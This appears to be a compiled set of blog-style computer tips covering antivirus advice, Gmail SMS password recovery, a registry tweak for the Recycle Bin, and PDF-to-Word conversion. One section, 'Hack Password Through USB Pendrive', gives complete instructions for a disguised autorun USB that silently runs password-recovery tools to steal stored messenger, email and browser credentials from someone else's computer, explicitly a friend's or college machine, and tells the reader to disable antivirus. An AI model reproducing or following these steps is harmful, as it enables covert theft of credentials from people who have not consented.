1. Use plain old common sense. When in doubt, err of the side of safety. Delete email attachments from people you don‘t know (WITHOUT opening them!). Beware especially aware of tempting animations on unprofessional-looking sites. Keep an eye out for strange links or attachments in Instant Messaging (IM) programs—they just might contain malicious code.
2. Still use floppies? Scan them before use. This tip is especially critical if you use floppy disks to transfer files between PCs. Always scan them for viruses and other threats before transferring their contents to any computer.
3. Label floppies—and dont share. Even well meaning associates can unwittingly transmit viruses, worms, Trojan horses or worse. Label your disks clearly, and ―neither a borrower nor lender be. Use alternate methods for sharing files.
4. Never boot from floppy disks. This is one of the most common ways viruses can be transmitted. Always remember to remove inserted floppies before shutting down any PC; otherwise, it will automatically attempt to boot from what may already be a virus-laden disk.
5. Avoid downloading files of which youre unsure. Be on the lookout for files such as freeware, screensavers, games or other executable programs. Internet news groups and web sites may be full of potential threats, so be sure to scan all downloads before running them. It may be helpful to download files to a ―Scan folder and then scan the entire folder‘s contents.
6. Frequently update your anti-virus software. Even the best anti-virus software isn‘t much help unless you keep it updated. New PC threats emerge daily—even hourly—and variations can often be engineered to slip by previous software versions. Most anti-virus software allows easy online updating.
7. Protect system startups. Make sure to configure anti-virus software to launch automatically and run constantly, ensuring that you‘re always protected.
8. Scan incoming email/attachments. Again, you must scan each attached file from email or IM messages—even those from trusted sources. Most PC security software automatically performs this function.
9. Dont automatically open email/attachments. This may seem redundant, but it‘s important. Make sure your email application doesn‘t automatically open messages (Check the program‘s Options or Preferences menus).
10. Install professional anti-virus software — and keep virus definitions up to date. Proper anti-virus and other PC security applications can scan files for unusual changes and other warning signs. This is by far the most important step you can take to keep PCs as safe and secure as possible.
Bishal obroy Suggesion: -“I hope you enjoyed our list of Top 10 Computer Security Tips. New PC security threats are unleashed every day, but with common sense, basic knowledge and the proper software tools, its possible to keep PCs—and the critical data inside them—safe, secure and available”

Recover Gmail Accounts Through SMS


Recover Gmail Accounts Through SMS
First of all..I would like to say that Gmail is out of Beta..yep..After a long time when they have integrated the best of world in their email system,it was the right time to rip off the tag,and they did it.Further,with the world going mobile,they took some of the steps to better enhance the security even a notch above than other email services. It helps to know that even the best of us forget our passwords from time to time and In fact,the sheer amount of people visit Gmail help center everyday just to recover their passwords. To help with these situations, Google went a step ahead by adding the ability to recover your password via text message.

 In order to access this feature, sign in to your account and select ' Change Password Recovery Options ' enter your cell phone number and click ' Save '
The Next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.
Bishal obroys Suggesion:-“ It's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and security question. And don't forget to keep them up-to-date”

How To Delete Your Recycle Bin


How To Delete Your Recycle Bin
If you're like me, you appreciate the clean desktop that XP offers. Unfortunately, one item remains: the Recycle Bin. You can't get rid of it through any menus or anything like that. After much hacking around in the registry, I finally found the responsible key. Simply Go Registry by typing regedit in run and following path and delete this

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio n\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA00 2F954E} and restart. When you restart, the Recycle Bin is no longer on the desktop.
 When you delete stuff, it still prompts to send it to the Recycle Bin, as always. To fully delete something, just delete it from C:\Recycled. or C:\Recycler (name depends on file system). To view this folder, you have to have everything set to be seen, including hidden folders and procted OS files and all that. Enjoy this handy tweak! :)

Alternatively instead of deleting the key mentioned above you can go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\HideDesktopIcons\NewStartPanel
and change the value for {645FF040-5081-101B-9F08-00AA002F954E}to 1

Bishal obroys Suggesion: -“Backup the key before you delete it, in case you change your mind.”

Hack Password Through USB Pendrive


Hack Password Through USB Pendrive

Today I will show you how to hack Passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools from www.ethicalhacking.do.am , extract them and copy only the executables (.exe files) into your USB Pendrive. i.e.: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun] open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

Step 1:- Insert the pendrive and the autorun window will pop-up. 103
(This is because, we have created an autorun pendrive).
Step 2:- In the pop-up window, select the first option (Perform a Virus Scan).
 Step 3:- Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. Step 4:- Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP, Vista and Windows 7 Warning: - This procedure will only recover the stored passwords (if any) on the Computer.
 Bishal obroys Suggesion: -“Very interesting hacking method just plug your Pen drive in any ones computer port and Bingo!! All passwords and secret details will comes under your belt”

How To Convert Pdf to Ms Word


How To Convert Pdf to Ms Word

Here is a software which can be help you to convert your PDF file to word.doc .The software is which do this for you and FREE is SolidConverter PDF. SolidConverter PDF is a flexible conversion tool for converting all or part of Adobe® Acrobat® PDF files to a Microsoft Word (DOC), rich text format (RTF) document, or plain text. You can also use SolidConverter PDF to extract images from a PDF file.
 There are two primary methods for document conversion:
Wizard Conversion. The wizard walks you through the process of opening a PDF file, explaining the steps in detail and allowing you to choose from different formatting and file saving options.
Fast Conversion. If you already are familiar with the document formatting options, you may want to use the fast method for converting files from PDF to a DOC or RTF format. This document tells you how to convert a PDF using the fast conversion method. Note that you can also quickly convert PDFs directly from Microsoft Word or Windows Explorer.
Step 1:- Open Solid Converter PDF You can open Solid Converter PDF using one of the following methods: Desktop. Double-click on the Solid Converter PDF icon.Windows Start menu. From your Microsoft Windows Start Programs menu, select Solid Documents|Solid Converter PDF|Solid Converter PDF.
Step 2: - Select File(s) In the SolidConverter PDF window, browse to the folder containing the PDF file(s) you want to convert. Select one or more source files to convert (you can hold down the CTRL key to select multiple files).
 Step 3: - Select Options At the bottom of the window, select your Reconstruction Mode. Options are: Flowing. Recovers page layout, columns, formatting, and graphics, and preserves text flow. Tables. Recovers page layout, columns, formatting, and graphics, but ignores columns.Continuous. Does not retain the exact layout of the document. Correctly reconstructs the text order but will only recover paragraph formatting, graphics, and text flow. Plain Text. Displays text without any formatting or layout. This mode will not recover formatting (characters or paragraphs) or graphics but will recover text flow using column and page layout analysis. (Note: You must use the wizard when converting a PDF file to plain text.) Exact. Uses Word text boxes to ensure that the text and graphic layout in the Word document is the same as the PDF file. This mode should not be used if you need to make lots of edits to the recovered content .
Step 4:- Elect Format Click the drop-down arrow next to the Convert button and select one of the following: Save as DOC. Saves the new document as a Microsoft Word document. Save as RTF. Saves the new document as a Rich Text Format (RTF) document.

Step 5:- Select Page Range (Optional) If you have selected the Prompt for Page Range option, the Convert Pages dialog box displays. Select the Pages from button, enter your starting and ending pages, and click OK. 
Step 6:- Finish Conversion A message will display that will notify you when the conversion is finished.

 Bishal obroys Suggesion:- “There are many websites which can do your PDF to word, presentation and even HTML too. Search of Google and you will find more than 100 sites which can do these conversions online”